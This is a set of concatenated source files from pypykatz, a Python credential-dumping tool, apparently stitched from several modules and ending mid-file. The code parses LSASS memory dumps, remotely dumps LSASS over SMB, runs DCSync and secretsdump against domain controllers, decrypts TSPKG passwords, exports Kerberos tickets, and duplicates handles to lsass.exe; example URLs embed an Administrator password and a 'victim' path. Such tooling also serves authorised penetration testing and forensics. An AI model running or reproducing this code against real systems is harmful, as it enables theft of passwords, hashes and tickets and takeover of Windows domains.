#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import json
import glob
import ntpath
import traceback
import asyncio

from pypykatz import logging
from pypykatz.apypykatz import apypykatz
from pypykatz.commons.common import UniversalEncoder
from pypykatz.alsadecryptor.packages.msv.decryptor import LogonSession



class LSACMDHelper:
	def __init__(self):
		self.live_keywords = ['lsa']
		self.keywords = ['lsa']
		
	def add_args(self, parser, live_parser):
		live_group = live_parser.add_parser('lsa', help='Get all secrets from LSASS')
		live_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		live_group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		live_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		live_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		live_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		live_group.add_argument('--method', choices = ['procopen', 'handledup'], default = 'procopen', help = 'LSASS process access method')
		
		group = parser.add_parser('lsa', help='Get secrets from memory dump')
		group.add_argument('cmd', choices=['minidump','rekall'])
		group.add_argument('memoryfile', help='path to the dump file')
		group.add_argument('-t','--timestamp_override', type=int, help='enforces msv timestamp override (0=normal, 1=anti_mimikatz)')
		group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		group.add_argument('-e','--halt-on-error', action='store_true',help = 'Stops parsing when a file cannot be parsed')
		group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		group.add_argument('-r', '--recursive', action='store_true', help = 'Recursive parsing')
		group.add_argument('-d', '--directory', action='store_true', help = 'Parse all dump files in a folder')
		group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')
		
	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			asyncio.run(self.run(args))
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
			
	def process_results(self, results, files_with_error, args):
		if args.outfile and args.json:
			with open(args.outfile, 'w') as f:
				json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)

		elif args.outfile and args.grep:
			with open(args.outfile, 'w', newline = '') as f:
				f.write(':'.join(LogonSession.grep_header) + '\r\n')
				for result in results:
					for luid in results[result].logon_sessions:
						for row in results[result].logon_sessions[luid].to_grep_rows():
							f.write(':'.join(row) + '\r\n')
		
		elif args.outfile:
			with open(args.outfile, 'w') as f:
				for result in results:
					f.write('FILE: ======== %s =======\n' % result)
					
					for luid in results[result].logon_sessions:
						f.write('\n'+str(results[result].logon_sessions[luid]))
					
					if len(results[result].orphaned_creds) > 0:
						f.write('\n== Orphaned credentials ==\n')
						for cred in results[result].orphaned_creds:
							f.write(str(cred))
					
				if len(files_with_error) > 0:
					f.write('\n== Failed to parse these files:\n')
					for filename in files_with_error:
						f.write('%s\n' % filename)
						
		elif args.json:
			print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
		
		elif args.grep:
			print(':'.join(LogonSession.grep_header))
			for result in results:
				for luid in results[result].logon_sessions:
					for row in results[result].logon_sessions[luid].to_grep_rows():
						print(':'.join(row))
				for cred in results[result].orphaned_creds:
					t = cred.to_dict()
					if t['credtype'] != 'dpapi':
						if t['password'] is not None:
							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
							print(':'.join(x))
					else:
						t = cred.to_dict()
						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
						print(':'.join(x))
		else:
			for result in results:
				print('FILE: ======== %s =======' % result)	
				if isinstance(results[result], str):
					print(results[result])
				else:
					for luid in results[result].logon_sessions:
						print(str(results[result].logon_sessions[luid]))
							
					if len(results[result].orphaned_creds) > 0:
						print('== Orphaned credentials ==')
						for cred in results[result].orphaned_creds:
							print(str(cred))
							
					

			if len(files_with_error) > 0:			
				print('\n==== Parsing errors:')
				for filename in files_with_error:
					print(filename)
		
		
		if args.kerberos_dir:
			dir = os.path.abspath(args.kerberos_dir)
			logging.info('Writing kerberos tickets to %s' % dir)
			for filename in results:
				base_filename = ntpath.basename(filename)
				ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
				results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
				for luid in results[filename].logon_sessions:
					for kcred in results[filename].logon_sessions[luid].kerberos_creds:
						for ticket in kcred.tickets:
							ticket.to_kirbi(dir)
							
				for cred in results[filename].orphaned_creds:
					if cred.credtype == 'kerberos':
						for ticket in cred.tickets:
							ticket.to_kirbi(dir)
		
	def run_live(self, args):
		return
			
	async def run(self, args):
		files_with_error = []
		results = {}
		###### Minidump
		if args.cmd == 'minidump':
			if args.directory:
				dir_fullpath = os.path.abspath(args.memoryfile)
				file_pattern = '*.dmp'
				if args.recursive == True:
					globdata = os.path.join(dir_fullpath, '**', file_pattern)
				else:	
					globdata = os.path.join(dir_fullpath, file_pattern)
					
				logging.info('Parsing folder %s' % dir_fullpath)
				for filename in glob.glob(globdata, recursive=args.recursive):
					logging.info('Parsing file %s' % filename)
					try:
						print('await')
						mimi = await apypykatz.parse_minidump_file(filename)
						results[filename] = mimi
					except Exception as e:
						files_with_error.append(filename)
						logging.exception('Error parsing file %s ' % filename)
						if args.halt_on_error == True:
							raise e
						else:
							pass
					
			else:
				logging.info('Parsing file %s' % args.memoryfile)
				try:
					mimi = await apypykatz.parse_minidump_file(args.memoryfile)
					results[args.memoryfile] = mimi
				except Exception as e:
					logging.exception('Error while parsing file %s' % args.memoryfile)
					if args.halt_on_error == True:
						raise e
					else:
						traceback.print_exc()
						
		self.process_results(results, files_with_error, args)




#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import os
import json
import ntpath
import platform
import argparse

from pypykatz import logging
from pypykatz.commons.common import UniversalEncoder
from pypykatz.alsadecryptor.packages.msv.decryptor import LogonSession
import asyncio

"""
This is a wrapper for aiosmb
"""

class SMBCMDArgs:
	def __init__(self):
		self.smb_url = None
		self.verbose = 0
		self.silent = True
		self.smb_url = None
		self.no_interactive = False
		self.commands = ['login', 'i']

smb_live_epilog = 'FOR AVAILABLE SUBCOMMANDS TYPE "... smb help" insted of "-h" '
class SMBCMDHelper:
	def __init__(self):
		self.live_keywords = ['smb']
		self.keywords = ['smb']
		
	def add_args(self, parser, live_parser):
		smb_group = parser.add_parser('smb', help='SMB related commands')
		smb_subparsers = smb_group.add_subparsers()
		smb_subparsers.required = True
		smb_subparsers.dest = 'smb_module'

		smb_console_group = smb_subparsers.add_parser('console', help='SMB client. Use "help" instead of "-h" to get the available subcommands')
		smb_console_group.add_argument('-v', '--verbose', action='count', default=0, help='Verbosity, can be stacked')
		smb_console_group.add_argument('url', help="SMB connection string")
		smb_console_group.add_argument('commands', nargs='*', help="!OPTIONAL! Takes a series of commands which will be executed until error encountered. If the command is 'i' is encountered during execution it drops back to interactive shell.")
		
		smb_lsassfile_group = smb_subparsers.add_parser('lsassfile', help='Parse a remote LSASS dump file.')
		smb_lsassfile_group.add_argument('url', help="SMB connection string with file in path field. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/C$/Users/victim/Desktop/lsass.DMP'")
		smb_lsassfile_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		smb_lsassfile_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		smb_lsassfile_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		smb_lsassfile_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')

		smb_lsassdump_group = smb_subparsers.add_parser('lsassdump', help='Yes.')
		smb_lsassdump_group.add_argument('url', help="SMB connection string Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102'")
		smb_lsassdump_group.add_argument('-m','--method', choices=['taskexec'] , default = 'taskexec', help = 'Print credentials in JSON format')
		smb_lsassdump_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		smb_lsassdump_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		smb_lsassdump_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		smb_lsassdump_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')


		smb_regfile_group = smb_subparsers.add_parser('regfile', help='Parse a remote registry hive dumps')
		smb_regfile_group.add_argument('url', help="SMB connection string with folder in path field. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/C$/Users/victim/Desktop/'")
		smb_regfile_group.add_argument('system', help='path to the SYSTEM registry hive')
		smb_regfile_group.add_argument('--sam', help='path to the SAM registry hive')
		smb_regfile_group.add_argument('--security', help='path to the SECURITY registry hive')
		smb_regfile_group.add_argument('--software', help='path to the SOFTWARE registry hive')
		smb_regfile_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		smb_regfile_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		
		smb_regsec_group = smb_subparsers.add_parser('regdump', help='Regsecrets')
		smb_regsec_group.add_argument('url', help="SMB connection string. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102'")
		smb_regsec_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		smb_regsec_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')

		smb_dcsync_group = smb_subparsers.add_parser('dcsync', help='DcSync')
		smb_dcsync_group.add_argument('url', help="SMB connection string with folder in path field. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/'")
		smb_dcsync_group.add_argument('-u', '--username', help='taget username')
		smb_dcsync_group.add_argument('-o', '--outfile', help = 'Save results to file')

		smb_secretsdump_group = smb_subparsers.add_parser('secretsdump', help='secretsdump')
		smb_secretsdump_group.add_argument('url', help="SMB connection string with folder in path field. Example: 'smb2+ntlm-password://TEST\\Administrator:QLFbT8zkiFGlJuf0B3Qq@10.10.10.102/'")
		smb_secretsdump_group.add_argument('--json', action='store_true',help = 'Print credentials in JSON format')
		smb_secretsdump_group.add_argument('-o', '--outfile', help = 'Save results to file (you can specify --json for json file, or text format will be written)')
		smb_secretsdump_group.add_argument('-k', '--kerberos-dir', help = 'Save kerberos tickets to a directory.')
		smb_secretsdump_group.add_argument('-g', '--grep', action='store_true', help = 'Print credentials in greppable format')


		live_subcommand_parser = argparse.ArgumentParser(add_help=False)                                                                                                  
		live_smb_subparsers = live_subcommand_parser.add_subparsers(help = 'LIVE DPAPI commands work under the current user context. Except: keys, wifi, chrome')
		live_smb_subparsers.required = True
		live_smb_subparsers.dest = 'livesmbcommand'

		live_console_parser = live_smb_subparsers.add_parser('console', help = 'SMB (live) client. Use "help" instead of "-h" to get the available subcommands')
		live_console_parser.add_argument('--authmethod', choices=['ntlm', 'kerberos'], default = 'ntlm', help= 'Authentication method to use during login')
		live_console_parser.add_argument('--protocol-version', choices=['2', '3'], default = '2', help= 'SMB protocol version. SMB1 is not supported.')
		live_console_parser.add_argument('-v', '--verbose', action='count', default=0, help='Verbosity, can be stacked')
		live_console_parser.add_argument('host', help='Target host to connect to')
		live_console_parser.add_argument('commands', nargs='*', help="!OPTIONAL! Takes a series of commands which will be executed until error encountered. If the command is 'i' is encountered during execution it drops back to interactive shell.")

		live_group = live_parser.add_parser('smb', help='SMB (live) commands', epilog=smb_live_epilog, parents=[live_subcommand_parser])
		
		
	def execute(self, args):
		if args.command in self.keywords:
			asyncio.run(self.run(args))
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			asyncio.run(self.run_live(args))
			
			
	async def run_live(self, args):
		if platform.system().lower() != 'windows':
			raise Exception('Live commands only work on Windows!')

		from aiosmb import logger as smblog

		if args.verbose == 0:
			smblog.setLevel(100)
		elif args.verbose == 1:
			smblog.setLevel(level=logging.INFO)
		else:
			level = 5 - args.verbose
			smblog.setLevel(level=level)

		if args.livesmbcommand == 'console':
			from aiosmb.examples.smbclient import amain
			from winacl.functions.highlevel import get_logon_info
			info = get_logon_info()
			la = SMBCMDArgs()
			la.smb_url = 'smb%s+sspi-%s://%s\\%s@%s' % (args.protocol_version, args.authmethod, info['domain'], info['username'], args.host)
			la.verbose = args.verbose

			if args.commands is not None and len(args.commands) > 0:
				la.commands = []
				if args.commands[0] == 'help':
					la.commands = ['help']
				else:
					if args.commands[0] != 'login':
						la.commands.append('login')
					
					for command in args.commands:
						la.commands.append(command)

			await amain(la)
			
	async def run(self, args):

		from aiosmb import logger as smblog

		if args.verbose == 0:
			smblog.setLevel(100)
		elif args.verbose == 1:
			smblog.setLevel(level=logging.INFO)
		else:
			level = 5 - args.verbose
			smblog.setLevel(level=level)
		
		if args.smb_module == 'lsassfile':
			from pypykatz.smb.lsassutils import lsassfile
			mimi = await lsassfile(args.url)
			self.process_results({'smbfile':mimi}, [], args)

		elif args.smb_module == 'lsassdump':
			from pypykatz.smb.lsassutils import lsassdump
			mimi = await lsassdump(args.url)
			self.process_results({'smbfile':mimi}, [], args)

		elif args.smb_module == 'secretsdump':
			from pypykatz.smb.lsassutils import lsassdump
			from pypykatz.smb.regutils import regdump
			from pypykatz.smb.dcsync import dcsync

			try:
				mimi = await lsassdump(args.url)
				if mimi is not None:
					self.process_results({'smbfile':mimi}, [], args, file_prefix='_lsass.txt')
			except Exception as e:
				logging.exception('[SECRETSDUMP] Failed to get LSASS secrets')
			
			try:
				po = await regdump(args.url)
				if po is not None:
					if args.outfile:
						po.to_file(args.outfile+'_registry.txt', args.json)
					else:
						if args.json:
							print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
						else:
							print(str(po))
			except Exception as e:
				logging.exception('[SECRETSDUMP] Failed to get registry secrets')
			

			try:
				if args.outfile is not None:
					outfile = open(args.outfile+'_dcsync.txt', 'w', newline = '')

				async for secret in dcsync(args.url):
					if args.outfile is not None:
						outfile.write(str(secret))
					else:
						print(str(secret))

			except Exception as e:
				logging.exception('[SECRETSDUMP] Failed to perform DCSYNC')
			finally:
				if args.outfile is not None:
					outfile.close()
		
		elif args.smb_module == 'dcsync':
			from pypykatz.smb.dcsync import dcsync
			
			if args.outfile is not None:
				outfile = open(args.outfile, 'w', newline = '')

			async for secret in dcsync(args.url, args.username):
				if args.outfile is not None:
					outfile.write(str(secret))
				else:
					print(str(secret))

			if args.outfile is not None:
				outfile.close()
		
		elif args.smb_module == 'regdump':
			from pypykatz.smb.regutils import regdump
			po = await regdump(args.url)

			if po is not None:
				if args.outfile:
					po.to_file(args.outfile, args.json)
				else:
					if args.json:
						print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
					else:
						print(str(po))
		
		elif args.smb_module == 'regfile':
			from pypykatz.smb.regutils import regfile
			po = await regfile(args.url, args.system, sam = args.sam, security = args.security, software = args.software)

			if po is not None:
				if args.outfile:
					po.to_file(args.outfile, args.json)
				else:
					if args.json:
						print(json.dumps(po.to_dict(), cls = UniversalEncoder, indent=4, sort_keys=True))
					else:
						print(str(po))

		elif args.smb_module == 'console':
			from aiosmb.examples.smbclient import amain
			la = SMBCMDArgs()
			la.smb_url = args.url
			la.verbose = args.verbose
			if args.commands is not None and len(args.commands) > 0:
				la.commands = []
				if args.commands[0] == 'help':
					la.commands = ['help']
				else:
					if args.commands[0] != 'login':
						la.commands.append('login')
					
					for command in args.commands:
						la.commands.append(command)

			await amain(la)

	def process_results(self, results, files_with_error, args, file_prefix = ''):
		if args.outfile and args.json:
			with open(args.outfile+file_prefix, 'w') as f:
				json.dump(results, f, cls = UniversalEncoder, indent=4, sort_keys=True)

		elif args.outfile and args.grep:
			with open(args.outfile+file_prefix, 'w', newline = '') as f:
				f.write(':'.join(LogonSession.grep_header) + '\r\n')
				for result in results:
					for luid in results[result].logon_sessions:
						for row in results[result].logon_sessions[luid].to_grep_rows():
							f.write(':'.join(row) + '\r\n')
		
		elif args.outfile:
			with open(args.outfile+file_prefix, 'w') as f:
				for result in results:
					f.write('FILE: ======== %s =======\n' % result)
					
					for luid in results[result].logon_sessions:
						f.write('\n'+str(results[result].logon_sessions[luid]))
					
					if len(results[result].orphaned_creds) > 0:
						f.write('\n== Orphaned credentials ==\n')
						for cred in results[result].orphaned_creds:
							f.write(str(cred))
					
				if len(files_with_error) > 0:
					f.write('\n== Failed to parse these files:\n')
					for filename in files_with_error:
						f.write('%s\n' % filename)
						
		elif args.json:
			print(json.dumps(results, cls = UniversalEncoder, indent=4, sort_keys=True))
		
		elif args.grep:
			print(':'.join(LogonSession.grep_header))
			for result in results:
				for luid in results[result].logon_sessions:
					for row in results[result].logon_sessions[luid].to_grep_rows():
						print(':'.join(row))
				for cred in results[result].orphaned_creds:
					t = cred.to_dict()
					if t['credtype'] != 'dpapi':
						if t['password'] is not None:
							x =  [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
							print(':'.join(x))
					else:
						t = cred.to_dict()
						x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
						print(':'.join(x))
		else:
			for result in results:
				print('FILE: ======== %s =======' % result)	
				if isinstance(results[result], str):
					print(results[result])
				else:
					for luid in results[result].logon_sessions:
						print(str(results[result].logon_sessions[luid]))
							
					if len(results[result].orphaned_creds) > 0:
						print('== Orphaned credentials ==')
						for cred in results[result].orphaned_creds:
							print(str(cred))
							
					

			if len(files_with_error) > 0:			
				print('\n==== Parsing errors:')
				for filename in files_with_error:
					print(filename)
		
		
		if args.kerberos_dir:
			dir = os.path.abspath(args.kerberos_dir)
			logging.info('Writing kerberos tickets to %s' % dir)
			for filename in results:
				base_filename = ntpath.basename(filename)
				ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
				results[filename].kerberos_ccache.to_file(os.path.join(dir, ccache_filename))
				for luid in results[filename].logon_sessions:
					for kcred in results[filename].logon_sessions[luid].kerberos_creds:
						for ticket in kcred.tickets:
							ticket.to_kirbi(dir)
							
				for cred in results[filename].orphaned_creds:
					if cred.credtype == 'kerberos':
						for ticket in cred.tickets:
							ticket.to_kirbi(dir)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
import json
from pypykatz import logger

from pypykatz.alsadecryptor.package_commons import PackageDecryptor
from pypykatz.alsadecryptor.win_datatypes import PRTL_AVL_TABLE

class TspkgCredential:
	def __init__(self):
		self.credtype = 'tspkg'
		self.username = None
		self.domainname = None
		self.password = None
		self.luid = None
	
	def to_dict(self):
		t = {}
		t['credtype'] = self.credtype
		t['username'] = self.username
		t['domainname'] = self.domainname
		t['password'] = self.password
		t['luid'] = self.luid
		return t
	def to_json(self):
		return json.dumps(self.to_dict())
		
	def __str__(self):
		t = '\t== TSPKG [%x]==\n' % self.luid
		t += '\t\tusername %s\n' % self.username
		t += '\t\tdomainname %s\n' % self.domainname
		t += '\t\tpassword %s\n' % self.password
		return t
		
class TspkgDecryptor(PackageDecryptor):
	def __init__(self, reader, decryptor_template, lsa_decryptor, sysinfo):
		super().__init__('Tspkg', lsa_decryptor, sysinfo, reader)
		self.decryptor_template = decryptor_template
		self.credentials = []
		

	async def find_first_entry(self):
		position = await self.find_signature('TSpkg.dll',self.decryptor_template.signature)
		ptr_entry_loc = await self.reader.get_ptr_with_offset(position + self.decryptor_template.avl_offset)
		ptr_entry = await self.reader.get_ptr(ptr_entry_loc)
		return ptr_entry, ptr_entry_loc
	
	async def start(self):
		try:
			entry_ptr_value, entry_ptr_loc = await self.find_first_entry()
		except Exception as e:
			self.log('Failed to find structs! Reason: %s' % e)
			return
		result_ptr_list = []
		await self.reader.move(entry_ptr_value)
		try:
			ptable = await PRTL_AVL_TABLE.load(self.reader)
			start_node = await ptable.read(self.reader)
		except Exception as e:
			logger.error('Failed to prcess TSPKG package! Reason: %s' % e)
			return
		await self.walk_avl(start_node.BalancedRoot.RightChild, result_ptr_list)
		for ptr in result_ptr_list:
			await self.log_ptr(ptr, self.decryptor_template.credential_struct.__name__)
			await self.reader.move(ptr)
			credential_struct = await self.decryptor_template.credential_struct.load(self.reader)
			primary_credential = await credential_struct.pTsPrimary.read(self.reader)
			if not primary_credential is None:
				c = TspkgCredential()
				c.luid = credential_struct.LocallyUniqueIdentifier
				#c.username = primary_credential.credentials.UserName.read_string(self.reader)
				#c.domainname = primary_credential.credentials.Domaine.read_string(self.reader)
				#### the above two lines will be switched, because it seems that username and domainname is always switched in this package.
				#### reason is beyond me...

				c.domainname = await primary_credential.credentials.UserName.read_string(self.reader)
				c.username = await primary_credential.credentials.Domaine.read_string(self.reader)
				
				if primary_credential.credentials.Password.Length != 0:
					enc_data = await primary_credential.credentials.Password.read_maxdata(self.reader)
					if c.username.endswith('$') is True:
						c.password = self.decrypt_password(enc_data, bytes_expected=True)
						if c.password is not None:
							c.password = c.password.hex()
					else:
						c.password = self.decrypt_password(enc_data)					
				
				self.credentials.append(c)


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
from pypykatz.lsadecryptor.lsa_template_nt5 import LsaTemplate_NT5
from pypykatz.lsadecryptor.lsa_template_nt6 import LsaTemplate_NT6
from pypykatz.lsadecryptor.lsa_decryptor_nt6 import LsaDecryptor_NT6
from pypykatz.lsadecryptor.lsa_decryptor_nt5 import LsaDecryptor_NT5

class LsaDecryptor:
	def __init__(self):
		pass
	
	@staticmethod
	def choose(reader, decryptor_template, sysinfo):
		if isinstance(decryptor_template, LsaTemplate_NT5):
			return LsaDecryptor_NT5(reader, decryptor_template, sysinfo)
		else:
			return LsaDecryptor_NT6(reader, decryptor_template, sysinfo)



from asn1crypto import core
from minikerberos.protocol.asn1_structs import krb5int32, APOptions, Ticket, EncryptedData, AP_REQ

UNIVERSAL = 0
APPLICATION = 1
CONTEXT = 2
TAG = 'explicit'

class MechType(core.ObjectIdentifier):
	_map = { 
		#'': 'SNMPv2-SMI::enterprises.311.2.2.30',
		'1.3.6.1.4.1.311.2.2.10': 'NTLMSSP - Microsoft NTLM Security Support Provider',
		'1.2.840.48018.1.2.2'   : 'MS KRB5 - Microsoft Kerberos 5',
		'1.2.840.113554.1.2.2'  : 'KRB5 - Kerberos 5',
		'1.2.840.113554.1.2.2.3': 'KRB5 - Kerberos 5 - User to User',
		'1.3.6.1.4.1.311.2.2.30': 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism',
	}

class InitialContextToken(core.Sequence):	
	class_ = 1
	tag    = 0
	_fields = [
		('thisMech', MechType, {'optional': False}),
		('unk_bool', core.Boolean, {'optional': False}),
		('innerContextToken', core.Any, {'optional': False}),
	]

	_oid_pair = ('thisMech', 'innerContextToken')
	_oid_specs = {
		'KRB5 - Kerberos 5': AP_REQ,
}



import ctypes
from pypykatz.commons.winapi.constants import *
from pypykatz.commons.winapi.local.function_defs.advapi32 import RevertToSelf, LookupPrivilegeValueW, OpenProcessToken, GetTokenInformation_sid, LookupAccountSidW, ConvertSidToStringSidA, DuplicateTokenEx, CreateProcessWithTokenW, SetThreadToken, ConvertStringSidToSidA, LOGON_NETCREDENTIALS_ONLY
from pypykatz.commons.winapi.local.function_defs.kernel32 import STARTUPINFOW


class ADVAPI32:
	def __init__(self):
		pass
	
	@staticmethod
	def LookupPrivilegeValue(system_name, privilege_name):
		return LookupPrivilegeValueW(system_name, privilege_name)
		
	@staticmethod
	def OpenProcessToken(process_handle, DesiredAccess = TOKEN_ALL_ACCESS):
		return OpenProcessToken(process_handle, DesiredAccess = DesiredAccess)
		
	
	@staticmethod
	def GetTokenInformation_sid(token_handle):
		return GetTokenInformation_sid(token_handle)
		
	
	@staticmethod
	def LookupAccountSid(lpSystemName, lpSid):
		return LookupAccountSidW(lpSystemName, lpSid)
		
		
	@staticmethod
	def ConvertSidToStringSid(lpSid):
		return ConvertSidToStringSidA(lpSid)
		
	@staticmethod
	def ConvertStringSidToSid(StringSid):
		return ConvertStringSidToSidA(StringSid)

	@staticmethod
	def DuplicateTokenEx(hExistingToken, dwDesiredAccess = TOKEN_ALL_ACCESS, lpTokenAttributes = None, ImpersonationLevel = SecurityImpersonation, TokenType = TokenPrimary):
		return DuplicateTokenEx(hExistingToken, dwDesiredAccess = dwDesiredAccess, lpTokenAttributes = lpTokenAttributes, ImpersonationLevel = ImpersonationLevel, TokenType = TokenType)
		
		
	@staticmethod
	def CreateProcessWithToken_manip(token, cmdline):
		SW_SHOW = 5
		STARTF_USESHOWWINDOW = 0x00000001
		
		lpStartupInfo			  = STARTUPINFOW()
		lpStartupInfo.cb		   = ctypes.sizeof(STARTUPINFOW)
		lpStartupInfo.lpReserved   = 0
		lpStartupInfo.lpDesktop	= 0
		lpStartupInfo.lpTitle	  = 0
		lpStartupInfo.dwFlags	  = STARTF_USESHOWWINDOW
		lpStartupInfo.cbReserved2  = 0
		lpStartupInfo.lpReserved2  = 0
		lpStartupInfo.wShowWindow  = SW_SHOW
		
		
		CREATE_NEW_CONSOLE        = 0x00000010
		CreateProcessWithTokenW(
			hToken = token, 
			dwLogonFlags = LOGON_NETCREDENTIALS_ONLY, 
			lpApplicationName = None, 
			lpCommandLine = cmdline, 
			dwCreationFlags = CREATE_NEW_CONSOLE, 
			lpEnvironment = None, 
			lpCurrentDirectory = None, 
			lpStartupInfo = lpStartupInfo
		)
		
		
	@staticmethod
	def SetThreadToken(token_handle, thread_handle = None):
		return SetThreadToken(token_handle, thread_handle = thread_handle)
	
	@staticmethod
	def RevertToSelf():
		return RevertToSelf()
		


import os
import sys
import ctypes
import enum
import logging

from pypykatz import logger
from .ntdll import *
from .kernel32 import *
from .psapi import *

class WindowsMinBuild(enum.Enum):
	WIN_XP = 2500
	WIN_2K3 = 3000
	WIN_VISTA = 5000
	WIN_7 = 7000
	WIN_8 = 8000
	WIN_BLUE = 9400
	WIN_10 = 9800

	
#utter microsoft bullshit commencing..
def getWindowsBuild():   
    class OSVersionInfo(ctypes.Structure):
        _fields_ = [
            ("dwOSVersionInfoSize" , ctypes.c_int),
            ("dwMajorVersion"      , ctypes.c_int),
            ("dwMinorVersion"      , ctypes.c_int),
            ("dwBuildNumber"       , ctypes.c_int),
            ("dwPlatformId"        , ctypes.c_int),
            ("szCSDVersion"        , ctypes.c_char*128)];
    GetVersionEx = getattr( ctypes.windll.kernel32 , "GetVersionExA")
    version  = OSVersionInfo()
    version.dwOSVersionInfoSize = ctypes.sizeof(OSVersionInfo)
    GetVersionEx( ctypes.byref(version) )    
    return version.dwBuildNumber
	
DELETE = 0x00010000
READ_CONTROL = 0x00020000
WRITE_DAC = 0x00040000
WRITE_OWNER = 0x00080000

SYNCHRONIZE = 0x00100000

STANDARD_RIGHTS_REQUIRED = DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER
STANDARD_RIGHTS_ALL = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE

if getWindowsBuild() >= WindowsMinBuild.WIN_VISTA.value:
	PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFFF
else:
	PROCESS_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF
	
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010

	
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms683217(v=vs.85).aspx
def enum_process_names():
	pid_to_name = {}
	
	for pid in EnumProcesses():
		if pid == 0:
			continue
		pid_to_name[pid] = 'Not found'
		try:
			process_handle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
		except Exception as e:
			continue
			
		pid_to_name[pid] = QueryFullProcessImageNameW(process_handle)
	return pid_to_name
	
	
def get_lsass_pid():
	pid_to_name = enum_process_names()
	for pid in pid_to_name:
		if pid_to_name[pid].lower().find('lsass.exe') != -1:
			return pid
			
	raise Exception('Failed to find lsass.exe')
	
def enum_lsass_handles():
	#searches for open LSASS process handles in all processes
	# you should be having SE_DEBUG enabled at this point
	RtlAdjustPrivilege(20)
	
	lsass_handles = []
	sysinfohandles = NtQuerySystemInformation(16)
	for pid in sysinfohandles:
		if pid == 4:
			continue
		#if pid != GetCurrentProcessId():
		#	continue
		for syshandle in sysinfohandles[pid]:
			#print(pid)
			try:
				pHandle = OpenProcess(PROCESS_DUP_HANDLE, False, pid)
			except Exception as e:
				logger.debug('Error opening process %s Reason: %s' % (pid, e))
				continue
			
			try:
				dupHandle = NtDuplicateObject(pHandle, syshandle.Handle, GetCurrentProcess(), PROCESS_QUERY_INFORMATION|PROCESS_VM_READ)
				#print(dupHandle)
			except Exception as e:
				logger.debug('Failed to duplicate object! PID: %s HANDLE: %s' % (pid, hex(syshandle.Handle)))
				continue
				
			oinfo = NtQueryObject(dupHandle, ObjectTypeInformation)
			if oinfo.Name.getString() == 'Process':
				try:
					pname = QueryFullProcessImageNameW(dupHandle)
					if pname.lower().find('lsass.exe') != -1:
						logger.debug('Found open handle to lsass! PID: %s HANDLE: %s' % (pid, hex(syshandle.Handle)))
						#print('%s : %s' % (pid, pname))
						lsass_handles.append((pid, dupHandle))
				except Exception as e:
					logger.debug('Failed to obtain the path of the process! PID: %s' % pid) 
					continue
	
	return lsass_handles
	


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

from pypykatz.crypto.aes import AESModeOfOperationCBC, AESModeOfOperationECB
